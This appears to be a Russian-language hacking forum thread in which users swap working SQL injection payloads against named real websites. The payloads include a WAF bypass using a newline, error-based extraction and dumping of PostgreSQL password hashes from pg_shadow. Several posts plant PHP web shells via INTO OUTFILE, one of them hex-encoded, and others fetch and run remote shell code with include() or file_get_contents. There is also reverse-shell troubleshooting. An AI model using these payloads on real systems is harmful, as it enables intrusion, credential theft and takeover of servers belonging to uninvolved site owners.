Почему? Не обязательно соединять строки - http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+'vot%20vivod'+--+ Ты просто забыл отсечь вывод с первого запроса, достаточно было поставить минус перед cat=
Можно так выводить : Code: http://www.music-master.ru/?action=show_list&cat=11069+'+and(select+1+from(select+count(*),concat(concat_ws(0x3a,column_name),floor(rand(0)*2))x+from+information_Schema.columns+group+by+x)a)+--+
Можно, конечно, и так, но обойти - это же гораздо интереснее 1) Методом научного тыка определяем, что блочится последовательность Code: ...union...select...from... 2) Из блока последовательности следует, что все три слова должны находиться в одной строке) 3) Пытаемся сделать так, чтобы одна строка стала двумя, вводя энтер (%0A ) Code: http://www.music-master.ru/?action=show_list&cat=-1'+union %0A select+table_name from information_schema.tables/* И все работает ^_^
есть LFI _http://www.alma-nah.com/soiskatelinew.php?a=[LFI] нуллбайт не отсекает .html , есть ли альтернатива? ПС Подкиньте хорошей манны.
ругается на тип и фильтрует кавычки http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+ Можно что-нибудь сделать в данном случае? подскажите плз
http://ethnography.omskreg.ru/page.php?id=-1+Union+select+version()::int,null,null,null,null,null,null,null,null,null--+ http://ethnography.omskreg.ru/page.php?id=-1+Union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+from+pg_shadow--+
Заливаю шелл через sql и пишу +union+select+'<? system($_REQUEST[cmd]); ?>'+from+mysql.user+into+outfile+тут путь Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница. Что не так делаю?)
бро, system() это системная обалочка, если хочешь исполнять php код, надо через eval <?php eval($_REQUEST[cmd]) ?>
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь
попробуй захексить код union+select+0x3c3f706870206576616c28245f4745545b5c27636d645c275d29203f3e+into+outfile
Сервер: Linux 2.6.26-2 При попытке бэк-конекта, командная строка просто висит пока не нажму отмена: У меня Win 2000 Может фаервол сервера блокирует? Пробовал порт 80, тоже самое. В чем может быть проблема и есть ли решение?
Если ты можешь писать значит можешь и читать. сделай LOAD_FILE и посмотри что у тебя туда падает. Для начала попробуй '<? phpinfo(); ?>'
Сервак Windows NT при заливке шела через sql пишу <? php eval($_REQUEST[cmd]); ?> Дальше при cmd=dir выводит директории Вопрос как залить шел в Winows NT через cmd?
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())-- почему вот тут кидает на главную, что можно сделать? http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+information_schema.SCHEMATA+--+
мен ты мне другое говорил )) если eval то cmd=copy($_GET,$_GET[d]);&s=http://твойсайт/shell.txt&d=/директория/shell.php; потом локальный инклуд(если директория не видно из веб) при allow_url_include=On cmd=include("http://твойсайт/shell.txt");
Добавлю еще один способ. Требования: allow_url_fopen = on cmd=eval(file_get_contents('http://site.ru/shell.txt')); Удалить php дескрипторы в начале и конце шелла. Преимущества: не нужно знать папку на запись. Недостатки: больше следит в логах
